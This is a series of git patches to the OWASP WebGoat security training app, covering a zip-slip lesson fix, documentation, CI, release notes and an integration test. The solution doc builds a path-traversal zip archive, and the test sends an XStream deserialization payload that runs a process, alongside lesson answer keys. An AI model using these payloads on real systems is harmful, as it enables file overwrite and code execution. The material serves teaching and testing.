 image::images/files.png[caption="Figure: ", style="lesson-image"]
 
 {nbsp}
 
-After uploading a file you can use the 'Link' to get the full URL to the uploaded
+After uploading a file, you can use the 'Link' to get the full URL to the uploaded
 file.

From fcaa2d8589e3085a354c09f0161f0b240302cd65 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 07:47:38 +0100
Subject: [PATCH 217/227] Fix zip slip lesson.

The lesson did not work properly as the directory is reused across several path traversal lessons. First thing before uploading the zip file we now clean the directory.

The html had a reference to a location of the profile picture, this was part of a hint but this only causes confusion as this is not indicating to where you need to upload the picture with the Zip Slip vulnerability.

The assignment now contains a direct hint as where the image needs to be saved. The assignment is about creating a vulnerable zip file and NOT about guessing where the image should be saved inside WebGoat.
---
 .../pathtraversal/ProfileUploadBase.java      | 41 +++++++++++++------
 .../lessons/pathtraversal/ProfileZipSlip.java | 14 ++++---
 .../PathTraversal_zip_slip_assignment.adoc    |  4 +-
 .../pathtraversal/html/PathTraversal.html     |  2 -
 4 files changed, 41 insertions(+), 20 deletions(-)

diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
index a1ca0967e..131f1674a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
@@ -3,10 +3,14 @@ package org.owasp.webgoat.lessons.pathtraversal;
 import java.io.File;
 import java.io.FileInputStream;
 import java.io.IOException;
+import java.nio.file.Files;
+import java.util.Arrays;
 import java.util.Base64;
+import java.util.List;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.SneakyThrows;
+import org.apache.commons.io.FilenameUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.container.session.WebSession;
@@ -32,14 +36,9 @@ public class ProfileUploadBase extends AssignmentEndpoint {
       return failed(this).feedback("path-traversal-profile-empty-name").build();
     }
 
-    var uploadDirectory =
-        new File(this.webGoatHomeDirectory, "/PathTraversal/" + webSession.getUserName());
-    if (uploadDirectory.exists()) {
-      FileSystemUtils.deleteRecursively(uploadDirectory);
-    }
+    File uploadDirectory = cleanupAndCreateDirectoryForUser();
 
     try {
-      uploadDirectory.mkdirs();
       var uploadedFile = new File(uploadDirectory, fullName);
       uploadedFile.createNewFile();
       FileCopyUtils.copy(file.getBytes(), uploadedFile);
@@ -57,6 +56,17 @@ public class ProfileUploadBase extends AssignmentEndpoint {
     }
   }
 
+  @SneakyThrows
+  protected File cleanupAndCreateDirectoryForUser() {
+    var uploadDirectory =
+        new File(this.webGoatHomeDirectory, "/PathTraversal/" + webSession.getUserName());
+    if (uploadDirectory.exists()) {
+      FileSystemUtils.deleteRecursively(uploadDirectory);
+    }
+    Files.createDirectories(uploadDirectory.toPath());
+    return uploadDirectory;
+  }
+
   private boolean attemptWasMade(File expectedUploadDirectory, File uploadedFile)
       throws IOException {
     return !expectedUploadDirectory
@@ -87,18 +97,25 @@ public class ProfileUploadBase extends AssignmentEndpoint {
     var profileDirectoryFiles = profilePictureDirectory.listFiles();
 
     if (profileDirectoryFiles != null && profileDirectoryFiles.length > 0) {
-      try (var inputStream = new FileInputStream(profileDirectoryFiles[0])) {
-        return Base64.getEncoder().encode(FileCopyUtils.copyToByteArray(inputStream));
-      } catch (IOException e) {
-        return defaultImage();
-      }
+      return Arrays.stream(profileDirectoryFiles)
+          .filter(file -> FilenameUtils.isExtension(file.getName(), List.of("jpg", "png")))
+          .findFirst()
+          .map(
+              file -> {
+                try (var inputStream = new FileInputStream(profileDirectoryFiles[0])) {
+                  return Base64.getEncoder().encode(FileCopyUtils.copyToByteArray(inputStream));
+                } catch (IOException e) {
+                  return defaultImage();
+                }
+              })
+          .orElse(defaultImage());
     } else {
       return defaultImage();
     }
   }
 
   @SneakyThrows
-  private byte[] defaultImage() {
+  protected byte[] defaultImage() {
     var inputStream = getClass().getResourceAsStream("/images/account.png");
     return Base64.getEncoder().encode(FileCopyUtils.copyToByteArray(inputStream));
   }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
index c14223560..49c7b15c3 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
@@ -13,13 +13,19 @@ import java.util.Enumeration;
 import java.util.zip.ZipEntry;
 import java.util.zip.ZipFile;
 import lombok.SneakyThrows;
+import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.ResponseEntity;
 import org.springframework.util.FileCopyUtils;
-import org.springframework.web.bind.annotation.*;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.multipart.MultipartFile;
 
 @RestController
@@ -29,6 +35,7 @@ import org.springframework.web.multipart.MultipartFile;
   "path-traversal-zip-slip.hint3",
   "path-traversal-zip-slip.hint4"
 })
+@Slf4j
 public class ProfileZipSlip extends ProfileUploadBase {
 
   public ProfileZipSlip(
@@ -52,12 +59,9 @@ public class ProfileZipSlip extends ProfileUploadBase {
   @SneakyThrows
   private AttackResult processZipUpload(MultipartFile file) {
     var tmpZipDirectory = Files.createTempDirectory(getWebSession().getUserName());
-    var uploadDirectory =
-        new File(getWebGoatHomeDirectory(), "/PathTraversal/" + getWebSession().getUserName());
+    cleanupAndCreateDirectoryForUser();
     var currentImage = getProfilePictureAsBase64();
 
-    Files.createDirectories(uploadDirectory.toPath());
-
     try {
       var uploadedZipFile = tmpZipDirectory.resolve(file.getOriginalFilename());
       FileCopyUtils.copy(file.getBytes(), uploadedZipFile.toFile());
diff --git a/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_assignment.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_assignment.adoc
index b96dc4d9e..2e3b70053 100644
--- a/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_assignment.adoc
+++ b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_assignment.adoc
@@ -2,11 +2,13 @@
 
 This time the developers only allow you to upload zip files. However, they made a programming mistake in uploading the zip file will extract it, but it will not replace your image. Can you find a way to overwrite your current image bypassing the programming mistake?
 
+To make the assignment a bit easier below you will find the location of the profile image you need to replace:
+
 |===
 |OS |Location
 
 |`operatingSystem:os[]`
-|`webGoatTempDir:temppath[]PathTraversal`
+|`webGoatTempDir:temppath[]PathTraversal/username:user[]/username:user[].jpg`
 
 |===
 
diff --git a/src/main/resources/lessons/pathtraversal/html/PathTraversal.html b/src/main/resources/lessons/pathtraversal/html/PathTraversal.html
index fd19a7495..5f716f71a 100644
--- a/src/main/resources/lessons/pathtraversal/html/PathTraversal.html
+++ b/src/main/resources/lessons/pathtraversal/html/PathTraversal.html
@@ -229,8 +229,6 @@
                   enctype="multipart/form-data"
                   action="/WebGoat/PathTraversal/zip-slip">
                 <div class="preview text-center">
-                    <img  th:src="@{|~/WebGoat/PathTraversal/zip-slip/profile-image/${#authentication.name}|}" width="1"
-                         height="1" />
                     <img class="preview-img" th:src="@{/images/account.png}" alt="Preview Image" width="200"
                          height="200" id="previewZipSlip"/>
                     <div class="browse-button">

From 54e115aff05eb9cf155899cdc73651afa7e604f0 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 07:49:15 +0100
Subject: [PATCH 218/227] Update the solution with WebWolf URLs

The new solution uses WebWolf paths as these will change automatically when a user start WebGoat on a different port. It no longer depends on the hardcoded port `8080`.
---
 .../documentation/PathTraversal_zip_slip_solution.adoc    | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc
index a9a71af73..a324008f4 100644
--- a/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc
+++ b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc
@@ -2,10 +2,10 @@
 
 First, let's create a zip file with an image inside:
 
-[source]
+[source, subs="macros"]
 ----
-curl -o cat.jpg http://localhost:8080/WebGoat/images/cats/1.jpg
-zip profile.zip cat.jpg
+curl -o webwolf.jpg webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png]
+zip profile.zip webwolf.jpg
 ----
 
 Now let's upload this as our profile image. We can see nothing happens as mentioned in the assignment there is a bug in the software, and the result we see on the screen is:
@@ -23,7 +23,7 @@ First, create the directory structure:
 ----
 mkdir -p webGoatTempDir:temppath[]PathTraversal/username:user[]
 cd webGoatTempDir:temppath[]PathTraversal/username:user[]
-curl -o username:user[] http://localhost:8080/WebGoat/images/cats/1.jpg
+curl -o username:user[].jpg webWolfRootLink:images/wolf.png[noLink, target=images/wolf.png]
 zip profile.zip ../../../../../../../..webGoatTempDir:temppath[]PathTraversal/username:user[]/username:user[].jpg
 ----
 

From dca415099fca6b35304f799c7e1fa802cb545124 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 11:05:46 +0100
Subject: [PATCH 219/227] Remove unused JavaScript function

---
 .../resources/lessons/pathtraversal/js/path_traversal.js    | 6 ------
 1 file changed, 6 deletions(-)

diff --git a/src/main/resources/lessons/pathtraversal/js/path_traversal.js b/src/main/resources/lessons/pathtraversal/js/path_traversal.js
index 0c2b341b8..955e7fe7b 100644
--- a/src/main/resources/lessons/pathtraversal/js/path_traversal.js
+++ b/src/main/resources/lessons/pathtraversal/js/path_traversal.js
@@ -70,9 +70,3 @@ webgoat.customjs.profileZipSlip = function () {
     formData.append("password", $("#passwordZipSlip").val());
     return formData;
 }
-
-webgoat.customjs.profileZipSlipRetrieval = function () {
-    $.get("PathTraversal/zip-slip", function (result, status) {
-        document.getElementById("previewZipSlip").src = "data:image/png;base64," + result;
-    });
-}

From 7664625afa01786db47448deb880fb126a528149 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 13:43:51 +0100
Subject: [PATCH 220/227] Add documentation about reusing the container.

The documentation now contains a description to reuse the initially create container. This way the user can start where they left off. The documentation only described creating a new container each and every time leaving users to create a new login each and every time.

Add documentation about reusing the container.

The documentation now contains a description to reuse the initially create container. This way the user can start where they left off. The documentation only described creating a new container each and every time leaving users to create a new login each and every time.
---
 README.md | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md
index ecda99449..60cd410f5 100644
--- a/README.md
+++ b/README.md
@@ -38,10 +38,23 @@ Every release is also published on [DockerHub](https://hub.docker.com/r/webgoat/
 The easiest way to start WebGoat as a Docker container is to use the all-in-one docker container. This is a docker image that has WebGoat and WebWolf running inside.
 
 ```shell
-
 docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/webgoat
 ```
 
+If you want to reuse the container, give it a name:
+
+```shell
+docker run --name webgoat -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/webgoat
+```
+
+As long as you don't remove the container you can use:
+
+```shell
+docker start webgoat
+```
+
+This way, you can start where you left off. If you remove the container, you need to use `docker run` again.
+
 **Important**: *Choose the correct timezone, so that the docker container and your host are in the same timezone. As it is important for the validity of JWT tokens used in certain exercises.*
 
 ## 2. Standalone

From 11776e1d6a9143e4131c44c7922b47ca4ab687fa Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 13:57:12 +0100
Subject: [PATCH 221/227] Remove explicit goal for code formatting

`mvn verify` already checks formatting, having a separate step is not necessary. We now also check Markdown files for correct formatting.
---
 .github/workflows/build.yml | 11 +----------
 1 file changed, 1 insertion(+), 10 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 16a6cf2b8..8d98b7a33 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -3,8 +3,6 @@ on:
   pull_request:
     paths-ignore:
       - '.txt'
-      - '*.MD'
-      - '*.md'
       - 'LICENSE'
       - 'docs/**'
   push:
@@ -16,8 +14,6 @@ on:
       - '*'
     paths-ignore:
       - '.txt'
-      - '*.MD'
-      - '*.md'
       - 'LICENSE'
       - 'docs/**'
 
@@ -47,10 +43,8 @@ jobs:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
           restore-keys: ${{ runner.os }}-m2-
-      - name: Check code formatting
-        run: mvn --no-transfer-progress spotless:check
       - name: Build with Maven
-        run: mvn --no-transfer-progress package
+        run: mvn --no-transfer-progress verify
 
   build:
     if: github.repository == 'WebGoat/WebGoat' && github.event_name == 'push'
@@ -70,8 +64,5 @@ jobs:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
               restore-keys: ubuntu-latest-m2-
-        - name: Check code formatting
-          #Fail fast
-          run: mvn --no-transfer-progress spotless:check
         - name: Test with Maven
           run: mvn --no-transfer-progress verify

From 59bfd7c6d42eab0b6991a8d249c17ccf7290e7a8 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 18:51:47 +0100
Subject: [PATCH 222/227] Move XXE to A05 - Security Misconfiguration

---
 src/main/java/org/owasp/webgoat/container/lessons/Category.java | 1 -
 src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java            | 2 +-
 2 files changed, 1 insertion(+), 2 deletions(-)

diff --git a/src/main/java/org/owasp/webgoat/container/lessons/Category.java b/src/main/java/org/owasp/webgoat/container/lessons/Category.java
index 8b4d64ee1..9fd8317da 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/Category.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Category.java
@@ -60,7 +60,6 @@ public enum Category {
     this.ranking = ranking;
   }
 
-  /** {@inheritDoc} */
   @Override
   public String toString() {
     return getName();
diff --git a/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
index e44c31851..0a69d4c15 100644
--- a/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/XXE.java
@@ -31,7 +31,7 @@ public class XXE extends Lesson {
 
   @Override
   public Category getDefaultCategory() {
-    return Category.A3;
+    return Category.A5;
   }
 
   @Override

From 390181436374468cab8bbe89f72711194ac051a5 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 18:52:13 +0100
Subject: [PATCH 223/227] Fix documentation link for XXE mitigation.

---
 src/main/resources/lessons/xxe/html/XXE.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/lessons/xxe/html/XXE.html b/src/main/resources/lessons/xxe/html/XXE.html
index dc60f5553..1360874a8 100644
--- a/src/main/resources/lessons/xxe/html/XXE.html
+++ b/src/main/resources/lessons/xxe/html/XXE.html
@@ -215,7 +215,7 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/documentation/XXE_mitigation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_mitigation.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">

From f766edcfcb3c209f4a70c428c069ef293b836026 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 20:31:24 +0100
Subject: [PATCH 224/227] Preparing release 2023.0

---
 README.md        |  4 ++--
 RELEASE_NOTES.md | 24 +++++++++++++++++++++---
 pom.xml          |  2 +-
 3 files changed, 24 insertions(+), 6 deletions(-)

diff --git a/README.md b/README.md
index 60cd410f5..44f30e7e5 100644
--- a/README.md
+++ b/README.md
@@ -62,7 +62,7 @@ This way, you can start where you left off. If you remove the container, you nee
 Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
-java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-8.2.3.jar
+java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-2023.0.jar
 ```
 
 Click the link in the log to start WebGoat.
@@ -125,7 +125,7 @@ For instance running as a jar on a Linux/macOS it will look like this:
 ```Shell
 export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE"
 export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations"
-java -jar target/webgoat-8.2.3-SNAPSHOT.jar
+java -jar target/webgoat-2023.0-SNAPSHOT.jar
 ```
 
 Or in a docker run it would (once this version is pushed into docker hub) look like this:
diff --git a/RELEASE_NOTES.md b/RELEASE_NOTES.md
index 0e217e36e..b0da20ea7 100644
--- a/RELEASE_NOTES.md
+++ b/RELEASE_NOTES.md
@@ -1,10 +1,15 @@
 # WebGoat release notes
 
-## Unreleased
+## Version 2023.0
+
+With great pleasure, we present you with a new release of WebGoat **2023.0**. Finally, it has been a while. This year starts with a new release of WebGoat. This year we will undoubtedly release more often. From this release on, we began to use a new versioning scheme (https://calver.org/#scheme).
+
+A big thanks to René Zubcevic and Àngel Ollé Blázquez for keeping the project alive this last year, and hopefully, we can make
+many more releases this year.
 
 ### New functionality
 
-- New year's resolution: major refactoring of WebGoat to simplify the setup and improve building times.
+- New year's resolution(2022): major refactoring of WebGoat to simplify the setup and improve building times.
 - Move away from multi-project setup:
   * This has a huge performance benefit when building the application. Build time locally is now `Total time:  42.469 s` (depends on your local machine of course)
   * No longer add Maven dependencies in several places
@@ -22,14 +27,27 @@
 - Updated introduction lesson to WebWolf.
 - Added language switch for support for multiple languages.
 - Removed logic to start WebGoat on a random port when port `8080` is taken. We would loop until we found a free port. We simplified this to just start on the specified port.
+- Add Google formatter for all our code, a PR now checks whether the code adheres to the standard.
+- Renaming of all packages and folders.
 - [#1039 New OWASP Top 10](https://github.com/WebGoat/WebGoat/issues/1093)
+- [#1065 New lesson about logging](https://github.com/WebGoat/WebGoat/issues/1065)
+
+### Bug fixes
+
+
 - [#1193 Vulnerable component lesson - java.desktop does not "opens java.beans" to unnamed module](https://github.com/WebGoat/WebGoat/issues/1193)
 - [#1176 Minor: XXE lesson 12 patch not reset by 'lesson reset' while it IS reset by leaving/returning to lesson](https://github.com/WebGoat/WebGoat/issues/1176)
 - [#1134 "Exploiting XStream" assignment does not work](https://github.com/WebGoat/WebGoat/issues/1134)
 - [#1130 Typo: Using Indrect References](https://github.com/WebGoat/WebGoat/issues/1130)
 - [#1101 SQL lesson not correct](https://github.com/WebGoat/WebGoat/issues/1101)
 - [#1079 startup.sh issues of WebWolf - cannot connect to the WebGoat DB](https://github.com/WebGoat/WebGoat/issues/1079)
-- [#1065 New lesson about logging](https://github.com/WebGoat/WebGoat/issues/1065)
+- [#1379 Move XXE to A05:2021-_Security_ Misconfiguration](https://github.com/WebGoat/WebGoat/issues/1379)
+- [#1298 SocketUtils is deprecated and will be removed in Spring Security 6](https://github.com/WebGoat/WebGoat/issues/1298)
+- [#1248 Rewrite the WebWolf Introduction Lesson with the new changes](https://github.com/WebGoat/WebGoat/issues/1248)
+- [#1200 Type cast error in sample code at JWT token section](https://github.com/WebGoat/WebGoat/issues/1200)
+- [#1173 --server.port=9000 is not respected on Windows (both cmd as Powershell)](https://github.com/WebGoat/WebGoat/issues/1173)
+- [#1103 (A1) path traversel lesson 7 seems broken](https://github.com/WebGoat/WebGoat/issues/1103)
+- [#986 - User registration not persistant](https://github.com/WebGoat/WebGoat/issues/986)
 
 ## Version 8.2.2
 
diff --git a/pom.xml b/pom.xml
index 21dcfc4c7..4e2ab4ccd 100644
--- a/pom.xml
+++ b/pom.xml
@@ -10,7 +10,7 @@
   </parent>
   <groupId>org.owasp.webgoat</groupId>
   <artifactId>webgoat</artifactId>
-  <version>8.2.3-SNAPSHOT</version>
+  <version>2023.0</version>
   <packaging>jar</packaging>
 
   <name>WebGoat</name>

From 174a59c35a45233a36a171ea3db0ff41fa3b114e Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 20:38:20 +0100
Subject: [PATCH 225/227] Preparing release 2023.1

---
 README.md        | 4 ++--
 RELEASE_NOTES.md | 4 ++--
 pom.xml          | 2 +-
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 44f30e7e5..6fb57e261 100644
--- a/README.md
+++ b/README.md
@@ -62,7 +62,7 @@ This way, you can start where you left off. If you remove the container, you nee
 Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
-java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-2023.0.jar
+java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-2023.1.jar
 ```
 
 Click the link in the log to start WebGoat.
@@ -125,7 +125,7 @@ For instance running as a jar on a Linux/macOS it will look like this:
 ```Shell
 export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE"
 export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations"
-java -jar target/webgoat-2023.0-SNAPSHOT.jar
+java -jar target/webgoat-2023.1-SNAPSHOT.jar
 ```
 
 Or in a docker run it would (once this version is pushed into docker hub) look like this:
diff --git a/RELEASE_NOTES.md b/RELEASE_NOTES.md
index b0da20ea7..0c7b44d33 100644
--- a/RELEASE_NOTES.md
+++ b/RELEASE_NOTES.md
@@ -1,8 +1,8 @@
 # WebGoat release notes
 
-## Version 2023.0
+## Version 2023.1
 
-With great pleasure, we present you with a new release of WebGoat **2023.0**. Finally, it has been a while. This year starts with a new release of WebGoat. This year we will undoubtedly release more often. From this release on, we began to use a new versioning scheme (https://calver.org/#scheme).
+With great pleasure, we present you with a new release of WebGoat **2023.1**. Finally, it has been a while. This year starts with a new release of WebGoat. This year we will undoubtedly release more often. From this release on, we began to use a new versioning scheme (https://calver.org/#scheme).
 
 A big thanks to René Zubcevic and Àngel Ollé Blázquez for keeping the project alive this last year, and hopefully, we can make
 many more releases this year.
diff --git a/pom.xml b/pom.xml
index 4e2ab4ccd..056b987c5 100644
--- a/pom.xml
+++ b/pom.xml
@@ -10,7 +10,7 @@
   </parent>
   <groupId>org.owasp.webgoat</groupId>
   <artifactId>webgoat</artifactId>
-  <version>2023.0</version>
+  <version>2023.1</version>
   <packaging>jar</packaging>
 
   <name>WebGoat</name>

From 323daae57872e431a634defcbbfd3b66e84335d8 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 5 Jan 2023 20:51:15 +0100
Subject: [PATCH 226/227] Vulnerable components only work in a Docker container

---
 .../webgoat/GeneralLessonIntegrationTest.java | 342 ++++++++++--------
 1 file changed, 183 insertions(+), 159 deletions(-)

diff --git a/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java b/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
index 60dfef04d..8522681a5 100644
--- a/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
+++ b/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
@@ -2,185 +2,209 @@ package org.owasp.webgoat;
 
 import io.restassured.RestAssured;
 import io.restassured.http.ContentType;
+import java.util.HashMap;
+import java.util.Map;
 import org.hamcrest.CoreMatchers;
 import org.hamcrest.MatcherAssert;
 import org.junit.jupiter.api.Test;
-
-import java.util.HashMap;
-import java.util.Map;
-
+import org.springframework.util.StringUtils;
 
 public class GeneralLessonIntegrationTest extends IntegrationTest {
 
-    @Test
-    public void httpBasics() {
-        startLesson("HttpBasics");
-        Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("person", "goatuser");
-        checkAssignment(url("HttpBasics/attack1"), params, true);
+  @Test
+  public void httpBasics() {
+    startLesson("HttpBasics");
+    Map<String, Object> params = new HashMap<>();
+    params.clear();
+    params.put("person", "goatuser");
+    checkAssignment(url("HttpBasics/attack1"), params, true);
 
-        params.clear();
-        params.put("answer", "POST");
-        params.put("magic_answer", "33");
-        params.put("magic_num", "4");
-        checkAssignment(url("HttpBasics/attack2"), params, false);
+    params.clear();
+    params.put("answer", "POST");
+    params.put("magic_answer", "33");
+    params.put("magic_num", "4");
+    checkAssignment(url("HttpBasics/attack2"), params, false);
 
-        params.clear();
-        params.put("answer", "POST");
-        params.put("magic_answer", "33");
-        params.put("magic_num", "33");
-        checkAssignment(url("HttpBasics/attack2"), params, true);
+    params.clear();
+    params.put("answer", "POST");
+    params.put("magic_answer", "33");
+    params.put("magic_num", "33");
+    checkAssignment(url("HttpBasics/attack2"), params, true);
 
-        checkResults("/HttpBasics/");
+    checkResults("/HttpBasics/");
+  }
+
+  @Test
+  public void httpProxies() {
+    startLesson("HttpProxies");
+    MatcherAssert.assertThat(
+        RestAssured.given()
+            .when()
+            .relaxedHTTPSValidation()
+            .cookie("JSESSIONID", getWebGoatCookie())
+            .header("x-request-intercepted", "true")
+            .contentType(ContentType.JSON)
+            .get(url("HttpProxies/intercept-request?changeMe=Requests are tampered easily"))
+            .then()
+            .statusCode(200)
+            .extract()
+            .path("lessonCompleted"),
+        CoreMatchers.is(true));
+
+    checkResults("/HttpProxies/");
+  }
+
+  @Test
+  public void cia() {
+    startLesson("CIA");
+    Map<String, Object> params = new HashMap<>();
+    params.clear();
+    params.put(
+        "question_0_solution",
+        "Solution 3: By stealing a database where names and emails are stored and uploading it to a website.");
+    params.put(
+        "question_1_solution",
+        "Solution 1: By changing the names and emails of one or more users stored in a database.");
+    params.put(
+        "question_2_solution",
+        "Solution 4: By launching a denial of service attack on the servers.");
+    params.put(
+        "question_3_solution",
+        "Solution 2: The systems security is compromised even if only one goal is harmed.");
+    checkAssignment(url("/WebGoat/cia/quiz"), params, true);
+    checkResults("/cia/");
+  }
+
+  @Test
+  public void vulnerableComponents() {
+    if (StringUtils.hasText(System.getProperty("running.in.docker"))) {
+      String solution =
+          "<contact class='dynamic-proxy'>\n"
+              + "<interface>org.owasp.webgoat.lessons.vulnerablecomponents.Contact</interface>\n"
+              + "  <handler class='java.beans.EventHandler'>\n"
+              + "    <target class='java.lang.ProcessBuilder'>\n"
+              + "      <command>\n"
+              + "        <string>calc.exe</string>\n"
+              + "      </command>\n"
+              + "    </target>\n"
+              + "    <action>start</action>\n"
+              + "  </handler>\n"
+              + "</contact>";
+      startLesson("VulnerableComponents");
+      Map<String, Object> params = new HashMap<>();
+      params.clear();
+      params.put("payload", solution);
+      checkAssignment(url("/WebGoat/VulnerableComponents/attack1"), params, true);
+      checkResults("/VulnerableComponents/");
     }
+  }
 
-    @Test
-    public void httpProxies() {
-        startLesson("HttpProxies");
-        MatcherAssert.assertThat(RestAssured.given()
-                .when().relaxedHTTPSValidation().cookie("JSESSIONID", getWebGoatCookie()).header("x-request-intercepted", "true")
-                .contentType(ContentType.JSON)
-                .get(url("HttpProxies/intercept-request?changeMe=Requests are tampered easily"))
-                .then()
-                .statusCode(200).extract().path("lessonCompleted"), CoreMatchers.is(true));
+  @Test
+  public void insecureLogin() {
+    startLesson("InsecureLogin");
+    Map<String, Object> params = new HashMap<>();
+    params.clear();
+    params.put("username", "CaptainJack");
+    params.put("password", "BlackPearl");
+    checkAssignment(url("/WebGoat/InsecureLogin/task"), params, true);
+    checkResults("/InsecureLogin/");
+  }
 
-        checkResults("/HttpProxies/");
-    }
+  @Test
+  public void securePasswords() {
+    startLesson("SecurePasswords");
+    Map<String, Object> params = new HashMap<>();
+    params.clear();
+    params.put("password", "ajnaeliclm^&&@kjn.");
+    checkAssignment(url("/WebGoat/SecurePasswords/assignment"), params, true);
+    checkResults("SecurePasswords/");
 
-    @Test
-    public void cia() {
-        startLesson("CIA");
-        Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("question_0_solution", "Solution 3: By stealing a database where names and emails are stored and uploading it to a website.");
-        params.put("question_1_solution", "Solution 1: By changing the names and emails of one or more users stored in a database.");
-        params.put("question_2_solution", "Solution 4: By launching a denial of service attack on the servers.");
-        params.put("question_3_solution", "Solution 2: The systems security is compromised even if only one goal is harmed.");
-        checkAssignment(url("/WebGoat/cia/quiz"), params, true);
-        checkResults("/cia/");
+    startLesson("AuthBypass");
+    params.clear();
+    params.put("secQuestion2", "John");
+    params.put("secQuestion3", "Main");
+    params.put("jsEnabled", "1");
+    params.put("verifyMethod", "SEC_QUESTIONS");
+    params.put("userId", "12309746");
+    checkAssignment(url("/WebGoat/auth-bypass/verify-account"), params, true);
+    checkResults("/auth-bypass/");
 
-    }
-    
-    @Test
-    public void vulnerableComponents() {
